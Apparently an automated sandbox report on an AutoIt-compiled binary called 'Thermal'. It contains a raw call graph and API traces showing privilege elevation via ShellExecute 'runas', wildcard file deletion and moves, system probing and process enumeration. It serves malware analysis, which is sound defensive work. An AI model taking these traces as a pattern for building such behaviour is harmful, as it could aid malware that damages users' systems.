100149 176217 100150->100102 100151->100104 100163 1877a8 65 API calls 100151->100163 100153 131207 59 API calls 100152->100153 100154 1403cf 100153->100154 100155 131207 59 API calls 100154->100155 100156 1403d7 100155->100156 100157 131207 59 API calls 100156->100157 100158 140323 100157->100158 100158->100108 100160 131207 59 API calls 100159->100160 100161 1310cb 100160->100161 100161->100122 100162->100149 100164 15e463 100165 12373a 59 API calls 100164->100165 100166 15e479 100165->100166 100167 15e48f 100166->100167 100168 15e4fa 100166->100168 100176 125376 60 API calls 100167->100176 100171 12b020 299 API calls 100168->100171 100170 15e4ce 100175 15e4ee Mailbox 100170->100175 100177 18890a 59 API calls Mailbox 100170->100177 100171->100175 100173 15f046 Mailbox 100175->100173 100178 18a48d 89 API calls 4 library calls 100175->100178 100176->100170 100177->100175 100178->100173 100179 147e83 100180 147e8f _fseek 100179->100180 100216 14a038 GetStartupInfoW 100180->100216 100182 147e94 100218 148dac GetProcessHeap 100182->100218 100184 147eec 100185 147ef7 100184->100185 100301 147fd3 58 API calls 3 library calls 100184->100301 100219 149d16 100185->100219 100188 147efd 100189 147f08 __RTC_Initialize 100188->100189 100302 147fd3 58 API calls 3 library calls 100188->100302 100240 14d802 100189->100240 100192 147f17 100193 147f23 GetCommandLineW 100192->100193 100303 147fd3 58 API calls 3 library calls 100192->100303 100259 155153 GetEnvironmentStringsW 100193->100259 100196 147f22 100196->100193 100199 147f3d 100200 147f48 100199->100200 100304 1432e5 58 API calls 3 library calls 100199->100304 100269 154f88 100200->100269 100203 147f4e 100204 147f59 100203->100204 100305 1432e5 58 API calls 3 library calls 100203->100305 100283 14331f 100204->100283 100207 147f61 100208 147f6c __wwincmdln 100207->100208 100306 1432e5 58 API calls 3 library calls 100207->100306 100289 135f8b 100208->100289 100211 147f80 100212 147f8f 100211->100212 100307 143588 58 API calls _doexit 100211->100307 100308 143310 58 API calls _doexit 100212->100308 100215 147f94 _fseek 100217 14a04e 100216->100217 100217->100182 100218->100184 100309 1433b7 36 API calls 2 library calls 100219->100309 100221 149d1b 100310 149f6c InitializeCriticalSectionAndSpinCount __mtinitlocknum 100221->100310 100223 149d20 100224 149d24 100223->100224 100312 149fba TlsAlloc 100223->100312 100311 149d8c 61 API calls 2 library calls 100224->100311 100227 149d29 100227->100188 100228 149d36 100228->100224 100229 149d41 100228->100229 100313 148a05 100229->100313 100232 149d83 100321 149d8c 61 API calls 2 library calls 100232->100321 100235 149d88 100235->100188 100236 149d62 100236->100232 100237 149d68 100236->100237 100320 149c63 58 API calls 4 library calls 100237->100320 100239 149d70 GetCurrentThreadId 100239->100188 100241 14d80e _fseek 100240->100241 100242 149e3b __lock 58 API calls 100241->100242 100243 14d815 100242->100243 100244 148a05 __calloc_crt 58 API calls 100243->100244 100245 14d826 100244->100245 100246 14d891 GetStartupInfoW 100245->100246 100247 14d831 _fseek @_EH4_CallFilterFunc@8 100245->100247 100253 14d8a6 100246->100253 100256 14d9d5 100246->100256 100247->100192 100248 14da9d 100335 14daad LeaveCriticalSection _doexit 100248->100335 100250 148a05 __calloc_crt 58 API calls 100250->100253 100251 14da22 GetStdHandle 100251->100256 100252 14da35 GetFileType 100252->100256 100253->100250 100254 14d8f4 100253->100254 100253->100256 100255 14d928 GetFileType 100254->100255 100254->100256 100333 14a05b InitializeCriticalSectionAndSpinCount 100254->100333 100255->100254 100256->100248 100256->100251 100256->100252 100334 14a05b InitializeCriticalSectionAndSpinCount 100256->100334 100260 155164 100259->100260 100261 147f33 100259->100261 100336 148a4d 58 API calls 2 library calls 100260->100336 100265 154d4b GetModuleFileNameW 100261->100265 100263 1551a0 FreeEnvironmentStringsW 100263->100261 100264 15518a _memmove 100264->100263 100266 154d7f _wparse_cmdline 100265->100266 100268 154dbf _wparse_cmdline 100266->100268 100337 148a4d 58 API calls 2 library calls 100266->100337 100268->100199 100270 154fa1 __wsetenvp 100269->100270 100271 154f99 100269->100271 100272 148a05 __calloc_crt 58 API calls 100270->100272 100271->100203 100276 154fca __wsetenvp 100272->100276 100273 155021 100274 142f85 _free 58 API calls 100273->100274 100274->100271 100275 148a05 __calloc_crt 58 API calls 100275->100276 100276->100271 100276->100273 100276->100275 100277 155046 100276->100277 100280 15505d 100276->100280 100338 154837 58 API calls _fseek 100276->100338 100278 142f85 _free 58 API calls 100277->100278 100278->100271 100339 148ff6 IsProcessorFeaturePresent 100280->100339 100282 155069 100282->100203 100285 14332b __IsNonwritableInCurrentImage 100283->100285 100362 14a701 100285->100362 100286 143349 __initterm_e 100287 142f70 __cinit 67 API calls 100286->100287 100288 143368 __cinit __IsNonwritableInCurrentImage 100286->100288 100287->100288 100288->100207 100290 136044 100289->100290 100291 135fa5 100289->100291 100290->100211 100292 135fdf IsThemeActive 100291->100292 100365 14359c 100292->100365 100296 13600b 100377 135f00 SystemParametersInfoW SystemParametersInfoW 100296->100377 100298 136017 100378 135240 100298->100378 100300 13601f SystemParametersInfoW 100300->100290 100301->100185 100302->100189 100303->100196 100307->100212 100308->100215 100309->100221 100310->100223 100311->100227 100312->100228 100316 148a0c 100313->100316 100315 148a47 100315->100232 100319 14a016 TlsSetValue 100315->100319 100316->100315 100317 148a2a 100316->100317 100322 155426 100316->100322 100317->100315 100317->100316 100330 14a362 Sleep 100317->100330 100319->100236 100320->100239 100321->100235 100323 155431 100322->100323 100324 15544c 100322->100324 100323->100324 100325 15543d 100323->100325 100327 15545c HeapAlloc 100324->100327 100328 155442 100324->100328 100332 1435d1 DecodePointer 100324->100332 100331 148d58 58 API calls __getptd_noexit 100325->100331 100327->100324 100327->100328 100328->100316 100330->100317 100331->100328 100332->100324 100333->100254 100334->100256 100335->100247 100336->100264 100337->100268 100338->100276 100340 149001 100339->100340 100345 148e89 100340->100345 100344 14901c 100344->100282 100346 148ea3 _memset ___raise_securityfailure 100345->100346 100347 148ec3 IsDebuggerPresent 100346->100347 100353 14a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 100347->100353 100350 148f87 ___raise_securityfailure 100354 14c826 100350->100354 100351 148faa 100352 14a370 GetCurrentProcess TerminateProcess 100351->100352 100352->100344 100353->100350 100355 14c830 IsProcessorFeaturePresent 100354->100355 100356 14c82e 100354->100356 100358 155b3a 100355->100358 100356->100351 100361 155ae9 5 API calls 2 library calls 100358->100361 100360 155c1d 100360->100351 100361->100360 100363 14a704 EncodePointer 100362->100363 100363->100363 100364 14a71e 100363->100364 100364->100286 100366 149e3b __lock 58 API calls 100365->100366 100367 1435a7 DecodePointer EncodePointer 100366->100367 100430 149fa5 LeaveCriticalSection 100367->100430 100369 136004 100370 143604 100369->100370 100371 14360e 100370->100371 100372 143628 100370->100372 100371->100372 100431 148d58 58 API calls __getptd_noexit 100371->100431 100372->100296 100374 143618 100432 148fe6 9 API calls _fseek 100374->100432 100376 143623 100376->100296 100377->100298 100379 13524d __ftell_nolock 100378->100379 100380 131207 59 API calls 100379->100380 100381 135258 GetCurrentDirectoryW 100380->100381 100433 134ec8 100381->100433 100383 13527e IsDebuggerPresent 100384 170b21 MessageBoxA 100383->100384 100385 13528c 100383->100385 100387 170b39 100384->100387 100386 1352a0 100385->100386 100385->100387 100501 1331bf 100386->100501 100541 13314d 59 API calls Mailbox 100387->100541 100391 170b49 100398 170b5f SetCurrentDirectoryW 100391->100398 100397 13536c Mailbox 100397->100300 100398->100397 100430->100369 100431->100374 100432->100376 100434 131207 59 API calls 100433->100434 100435 134ede 100434->100435 100543 135420 100435->100543 100437 134efc 100438 1319e1 59 API calls 100437->100438 100439 134f10 100438->100439 100440 131c9c 59 API calls 100439->100440 100441 134f1b 100440->100441 100557 12477a 100441->100557 100444 131a36 59 API calls 100445 134f34 100444->100445 100446 1239be 68 API calls 100445->100446 100447 134f44 Mailbox 100446->100447 100448 131a36 59 API calls 100447->100448 100449 134f68 100448->100449 100450 1239be 68 API calls 100449->100450 100451 134f77 Mailbox 100450->100451 100452 131207 59 API calls 100451->100452 100453 134f94 100452->100453 100560 1355bc 100453->100560 100456 14312d _W_store_winword 60 API calls 100457 134fae 100456->100457 100458 170a54 100457->100458 100459 134fb8 100457->100459 100460 1355bc 59 API calls 100458->100460 100461 14312d _W_store_winword 60 API calls 100459->100461 100462 170a68 100460->100462 100463 134fc3 100461->100463 100465 1355bc 59 API calls 100462->100465 100463->100462 100464 134fcd 100463->100464 100466 14312d _W_store_winword 60 API calls 100464->100466 100469 170a84 100465->100469 100467 134fd8 100466->100467 100468 134fe2 100467->100468 100467->100469 100471 14312d _W_store_winword 60 API calls 100468->100471 100470 1400cf 61 API calls 100469->100470 100472 170aa7 100470->100472 100473 134fed 100471->100473 100474 1355bc 59 API calls 100472->100474 100475 134ff7 100473->100475 100476 170ad0 100473->100476 100477 170ab3 100474->100477 100478 13501b 100475->100478 100481 131c9c 59 API calls 100475->100481 100479 1355bc 59 API calls 100476->100479 100480 131c9c 59 API calls 100477->100480 100485 1247be 59 API calls 100478->100485 100482 170aee 100479->100482 100483 170ac1 100480->100483 100484 13500e 100481->100484 100486 131c9c 59 API calls 100482->100486 100487 1355bc 59 API calls 100483->100487 100488 1355bc 59 API calls 100484->100488 100489 13502a 100485->100489 100490 170afc 100486->100490 100487->100476 100488->100478 100491 124540 59 API calls 100489->100491 100492 1355bc 59 API calls 100490->100492 100493 135038 100491->100493 100494 170b0b 100492->100494 100566 1243d0 100493->100566 100494->100494 100496 12477a 59 API calls 100498 135055 100496->100498 100497 1243d0 59 API calls 100497->100498 100498->100496 100498->100497 100499 1355bc 59 API calls 100498->100499 100500 13509b Mailbox 100498->100500 100499->100498 100500->100383 100502 1331cc __ftell_nolock 100501->100502 100503 170314 _memset 100502->100503 100504 1331e5 100502->100504 100506 170330 GetOpenFileNameW 100503->100506 100505 140284 60 API calls 100504->100505 100507 1331ee 100505->100507 100508 17037f 100506->100508 100577 1409c5 100507->100577 100511 131821 59 API calls 100508->100511 100513 170394 100511->100513 100513->100513 100514 133203 100595 13278a 100514->100595 100541->100391 100544 13542d __ftell_nolock 100543->100544 100545 131821 59 API calls 100544->100545 100551 135590 Mailbox 100544->100551 100547 13545f 100545->100547 100546 131609 59 API calls 100546->100547 100547->100546 100556 135495 Mailbox 100547->100556 100548 131609 59 API calls 100548->100556 100549 135563 100550 131a36 59 API calls 100549->100550 100549->100551 100552 135584 100550->100552 100551->100437 100554 134c94 59 API calls 100552->100554 100553 131a36 59 API calls 100553->100556 100554->100551 100555 134c94 59 API calls 100555->100556 100556->100548 100556->100549 100556->100551 100556->100553 100556->100555 100558 140fe6 Mailbox 59 API calls 100557->100558 100559 124787 100558->100559 100559->100444 100561 1355c6 100560->100561 100562 1355df 100560->100562 100563 131c9c 59 API calls 100561->100563 100564 131821 59 API calls 100562->100564 100565 134fa0 100563->100565 100564->100565 100565->100456 100567 15d6c9 100566->100567 100569 1243e7 100566->100569 100567->100569 100576 1240cb 59 API calls Mailbox 100567->100576 100570 1244ef 100569->100570 100571 124530 100569->100571 100572 1244e8 100569->100572 100570->100498 100575 12523c 59 API calls 100571->100575 100574 140fe6 Mailbox 59 API calls 100572->100574 100574->100570 100575->100570 100576->100569 100578 151b70 __ftell_nolock 100577->100578 100579 1409d2 GetLongPathNameW 100578->100579 100580 131821 59 API calls 100579->100580 100581 1331f7 100580->100581 100582 132f3d 100581->100582 100583 131207 59 API calls 100582->100583 100584 132f4f 100583->100584 100585 140284 60 API calls 100584->100585 100586 132f5a 100585->100586 100587 132f65 100586->100587 100592 170177 100586->100592 100588 134c94 59 API calls 100587->100588 100590 132f71 100588->100590 100589 13151f 61 API calls 100589->100592 100629 121307 100590->100629 100592->100589 100594 170191 100592->100594 100593 132f84 Mailbox 100593->100514 100635 1349c2 100595->100635 100630 121319 100629->100630 100634 121338 _memmove 100629->100634 100632 140fe6 Mailbox 59 API calls 100630->100632 100631 140fe6 Mailbox 59 API calls 100633 12134f 100631->100633 100632->100634 100633->100593 100634->100631 100819 134b29 100635->100819 100640 1708bb 100643 134a2f 84 API calls 100640->100643 100641 1349ed LoadLibraryExW 100829 134ade 100641->100829 100645 1708c2 100643->100645 100647 134ade 3 API calls 100645->100647 100649 1708ca 100647->100649 100648 134a14 100648->100649 100855 134ab2 100649->100855 100868 134b77 100819->100868 100822 134b77 2 API calls 100825 134b50 100822->100825 100823 134b60 FreeLibrary 100824 1349d4 100823->100824 100826 14547b 100824->100826 100825->100823 100825->100824 100872 145490 100826->100872 100828 1349e1 100828->100640 100828->100641 100953 134baa 100829->100953 100832 134baa 2 API calls 100835 134b03 100832->100835 100833 134b15 FreeLibrary 100834 134a05 100833->100834 100836 1348b0 100834->100836 100835->100833 100835->100834 100837 140fe6 Mailbox 59 API calls 100836->100837 100838 1348c5 100837->100838 100839 13433f 59 API calls 100838->100839 100840 1348d1 _memmove 100839->100840 100841 17080a 100840->100841 100842 13490c 100840->100842 100844 170817 100841->100844 100962 189ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100841->100962 100843 134a6e 69 API calls 100842->100843 100845 134915 100843->100845 100963 189f5e 95 API calls 100844->100963 100848 134ab2 74 API calls 100845->100848 100849 170859 100845->100849 100852 134a8c 85 API calls 100845->100852 100854 1349a0 100845->100854 100848->100845 100957 134a8c 100849->100957 100852->100845 100854->100648 100856 170945 100855->100856 100857 134ac4 100855->100857 101069 145802 100857->101069 100860 1896c4 101194 18951a 100860->101194 100869 134b44 100868->100869 100870 134b80 LoadLibraryA 100868->100870 100869->100822 100869->100825 100870->100869 100871 134b91 GetProcAddress 100870->100871 100871->100869 100873 14549c _fseek 100872->100873 100874 1454af 100873->100874 100877 1454e0 100873->100877 100921 148d58 58 API calls __getptd_noexit 100874->100921 100876 1454b4 100922 148fe6 9 API calls _fseek 100876->100922 100891 150718 100877->100891 100880 1454e5 100881 1454ee 100880->100881 100882 1454fb 100880->100882 100923 148d58 58 API calls __getptd_noexit 100881->100923 100884 145525 100882->100884 100885 145505 100882->100885 100906 150837 100884->100906 100924 148d58 58 API calls __getptd_noexit 100885->100924 100887 1454bf _fseek @_EH4_CallFilterFunc@8 100887->100828 100892 150724 _fseek 100891->100892 100893 149e3b __lock 58 API calls 100892->100893 100894 150732 100893->100894 100895 1507ad 100894->100895 100901 149ec3 __mtinitlocknum 58 API calls 100894->100901 100904 1507a6 100894->100904 100929 146e7d 59 API calls __lock 100894->100929 100930 146ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100894->100930 100931 148a4d 58 API calls 2 library calls 100895->100931 100898 1507b4 100898->100904 100932 14a05b InitializeCriticalSectionAndSpinCount 100898->100932 100899 150823 _fseek 100899->100880 100901->100894 100903 1507da EnterCriticalSection 100903->100904 100926 15082e 100904->100926 100915 150857 __wopenfile 100906->100915 100907 150871 100937 148d58 58 API calls __getptd_noexit 100907->100937 100909 150a2c 100909->100907 100913 150a8f 100909->100913 100910 150876 100938 148fe6 9 API calls _fseek 100910->100938 100912 145530 100925 145552 LeaveCriticalSection LeaveCriticalSection __wfsopen 100912->100925 100934 1587d1 100913->100934 100915->100907 100915->100909 100915->100915 100939 1439fb 60 API calls 2 library calls 100915->100939 100917 150a25 100917->100909 100940 1439fb 60 API calls 2 library calls 100917->100940 100919 150a44 100919->100909 100941 1439fb 60 API calls 2 library calls 100919->100941 100921->100876 100922->100887 100923->100887 100924->100887 100925->100887 100933 149fa5 LeaveCriticalSection 100926->100933 100928 150835 100928->100899 100929->100894 100930->100894 100931->100898 100932->100903 100933->100928 100942 157fb5 100934->100942 100937->100910 100938->100912 100939->100917 100940->100919 100941->100909 100944 157fc1 _fseek 100942->100944 100943 157fd7 100945 148d58 _fseek 58 API calls 100943->100945 100944->100943 100947 15800d 100944->100947 100946 157fdc 100945->100946 100948 15807e __wsopen_nolock 109 API calls 100947->100948 100950 158029 100948->100950 100954 134af7 100953->100954 100955 134bb3 LoadLibraryA 100953->100955 100954->100832 100954->100835 100955->100954 100956 134bc4 GetProcAddress 100955->100956 100956->100954 100962->100844 100963->100845 101072 14581d 101069->101072 101071 134ad5 101071->100860 101073 145829 _fseek 101072->101073 101074 14586c 101073->101074 101075 14583f _memset 101073->101075 101076 145864 _fseek 101073->101076 101077 146e3e __lock_file 59 API calls 101074->101077 101099 148d58 58 API calls __getptd_noexit 101075->101099 101076->101071 101079 145872 101077->101079 101085 14563d 101079->101085 101080 145859 101100 148fe6 9 API calls _fseek 101080->101100 101086 145673 101085->101086 101089 145658 _memset 101085->101089 101101 1458a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 101086->101101 101087 145663 101089->101086 101089->101087 101091 1456b3 101089->101091 101091->101086 101093 1457c4 _memset 101091->101093 101094 144906 __fclose_nolock 58 API calls 101091->101094 101102 15108b 101091->101102 101170 150dd7 101091->101170 101192 150ef8 58 API calls 3 library calls 101091->101192 101094->101091 101099->101080 101100->101076 101101->101076 101192->101091 101197 14542a GetSystemTimeAsFileTime 101194->101197 101198 145458 __aulldiv 101197->101198 101375 129a88 101378 1286e0 101375->101378 101379 1286fd 101378->101379 101380 160fad 101379->101380 101381 160ff8 101379->101381 101406 128724 101379->101406 101384 160fb5 101380->101384 101387 160fc2 101380->101387 101380->101406 101413 19aad0 299 API calls __cinit 101381->101413 101382 125278 59 API calls 101382->101406 101411 19b0e4 299 API calls 101384->101411 101385 142f70 __cinit 67 API calls 101385->101406 101402 12898d 101387->101402 101412 19b58c 299 API calls 3 library calls 101387->101412 101388 123f42 68 API calls 101388->101406 101391 123c30 68 API calls 101391->101406 101392 161289 101392->101392 101393 1611af 101416 19ae3b 89 API calls 101393->101416 101396 128a17 101397 1239be 68 API calls 101397->101406 101402->101396 101417 18a48d 89 API calls 4 library calls 101402->101417 101403 1253b0 299 API calls 101403->101406 101404 131c9c 59 API calls 101404->101406 101406->101382 101406->101385 101406->101388 101406->101391 101406->101393 101406->101396 101406->101397 101406->101402 101406->101403 101406->101404 101407 123938 68 API calls 101406->101407 101408 12855e 299 API calls 101406->101408 101409 1284e2 89 API calls 101406->101409 101410 12835f 299 API calls 101406->101410 101414 12523c 59 API calls 101406->101414 101415 1773ab 59 API calls 101406->101415 101407->101406 101408->101406 101409->101406 101410->101406 101411->101387 101412->101402 101413->101406 101414->101406 101415->101406 101416->101402 101417->101392 101418 129a6c 101421 12829c 101418->101421 101420 129a78 101422 1282b4 101421->101422 101429 128308 101421->101429 101423 1253b0 299 API calls 101422->101423 101422->101429 101427 1282eb 101423->101427 101425 160ed8 101425->101425 101426 128331 101426->101420 101427->101426 101430 12523c 59 API calls 101427->101430 101429->101426 101431 18a48d 89 API calls 4 library calls 101429->101431 101430->101429 101431->101425
                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0013526C
                                                      • IsDebuggerPresent.KERNEL32 ref: 0013527E
                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 001352E6
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                        • Part of subcall function 0012BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0012BC07
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00135366
                                                      • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00170B2E
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00170B66
                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001D6D10), ref: 00170BE9
                                                      • ShellExecuteW.SHELL32(00000000), ref: 00170BF0
                                                        • Part of subcall function 0013514C: GetSysColorBrush.USER32(0000000F), ref: 00135156
                                                        • Part of subcall function 0013514C: LoadCursorW.USER32(00000000,00007F00), ref: 00135165
                                                        • Part of subcall function 0013514C: LoadIconW.USER32(00000063), ref: 0013517C
                                                        • Part of subcall function 0013514C: LoadIconW.USER32(000000A4), ref: 0013518E
                                                        • Part of subcall function 0013514C: LoadIconW.USER32(000000A2), ref: 001351A0
                                                        • Part of subcall function 0013514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001351C6
                                                        • Part of subcall function 0013514C: RegisterClassExW.USER32(?), ref: 0013521C
                                                        • Part of subcall function 001350DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00135109
                                                        • Part of subcall function 001350DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0013512A
                                                        • Part of subcall function 001350DB: ShowWindow.USER32(00000000), ref: 0013513E
                                                        • Part of subcall function 001350DB: ShowWindow.USER32(00000000), ref: 00135147
                                                        • Part of subcall function 001359D3: _memset.LIBCMT ref: 001359F9
                                                        • Part of subcall function 001359D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00135A9E
                                                      Strings
                                                      • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00170B28
                                                      • runas, xrefs: 00170BE4
                                                      • AutoIt, xrefs: 00170B23
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                      • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                      • API String ID: 529118366-2030392706
                                                      • Opcode ID: a13b6abb1585de2af52c11818a2f788d2196e21fb3bc5faef21c5b35b04eb14d
                                                      • Instruction ID: 2c44f43202e06f865b8de687adaa244d1bae6560bd809648154e2b0cf8627bd9
                                                      • Opcode Fuzzy Hash: a13b6abb1585de2af52c11818a2f788d2196e21fb3bc5faef21c5b35b04eb14d
                                                      • Instruction Fuzzy Hash: C5511730908689EEDF02EBF0DC85EEE7B75AF29740F144165F651671A2CB704685C720
                                                      APIs
                                                        • Part of subcall function 00140284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00132A58,?,00008000), ref: 001402A4
                                                        • Part of subcall function 00184FEC: GetFileAttributesW.KERNEL32(?,00183BFE), ref: 00184FED
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00183D96
                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00183E3E
                                                      • MoveFileW.KERNEL32(?,?), ref: 00183E51
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00183E6E
                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00183E90
                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00183EAC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 4002782344-1173974218
                                                      • Opcode ID: 9429dd34161c76886f4a26f271f061c47f10482d3d599b4c8e8123f0c6e2cc57
                                                      • Instruction ID: 9aefde694be692a78d224c643de8a904f85c11f38b31ac7985cf247ebc2c488a
                                                      • Opcode Fuzzy Hash: 9429dd34161c76886f4a26f271f061c47f10482d3d599b4c8e8123f0c6e2cc57
                                                      • Instruction Fuzzy Hash: 3B51603180115DAACF15FBE0CA929EEB779AF25301F644269E452B7192EF316F09CF60
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 00135D40
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      • GetCurrentProcess.KERNEL32(?,001B0A18,00000000,00000000,?), ref: 00135E07
                                                      • IsWow64Process.KERNEL32(00000000), ref: 00135E0E
                                                      • GetNativeSystemInfo.KERNEL32(00000000), ref: 00135E54
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00135E5F
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00135E90
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00135E9C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                      • String ID:
                                                      • API String ID: 1986165174-0
                                                      • Opcode ID: bdff1134fbf08ea6a661f352aab8b4fb9f60ca65c802670a2b70ff9eece7023b
                                                      • Instruction ID: 87fd7b1108728943f8869a1722c9f4a001feef6f5d64fbde9fdd3b6f1a5bd7a3
                                                      • Opcode Fuzzy Hash: bdff1134fbf08ea6a661f352aab8b4fb9f60ca65c802670a2b70ff9eece7023b
                                                      • Instruction Fuzzy Hash: 58919031549BC0DEC735CB6884505ABFFF66F2A700F984AAED0CA97A41D320A648C769
                                                      APIs
                                                        • Part of subcall function 00140284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00132A58,?,00008000), ref: 001402A4
                                                        • Part of subcall function 00184FEC: GetFileAttributesW.KERNEL32(?,00183BFE), ref: 00184FED
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0018407C
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 001840CC
                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 001840DD
                                                      • FindClose.KERNEL32(00000000), ref: 001840F4
                                                      • FindClose.KERNEL32(00000000), ref: 001840FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 2649000838-1173974218
                                                      • Opcode ID: 62f592c88482c45c70d51d12ab651f57077abbdc2f8449f2c256873a591b5513
                                                      • Instruction ID: f4cdf421278d0d50559979183dfab6e04d54f93a5bd777445a10e297669769c9
                                                      • Opcode Fuzzy Hash: 62f592c88482c45c70d51d12ab651f57077abbdc2f8449f2c256873a591b5513
                                                      • Instruction Fuzzy Hash: E1316E31008385ABC705FB64C8959AFB7A8BFA5304F444A1DF5E582192EF20DA09CBA3
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0018416D
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0018417B
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0018419B
                                                      • CloseHandle.KERNEL32(00000000), ref: 00184245
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
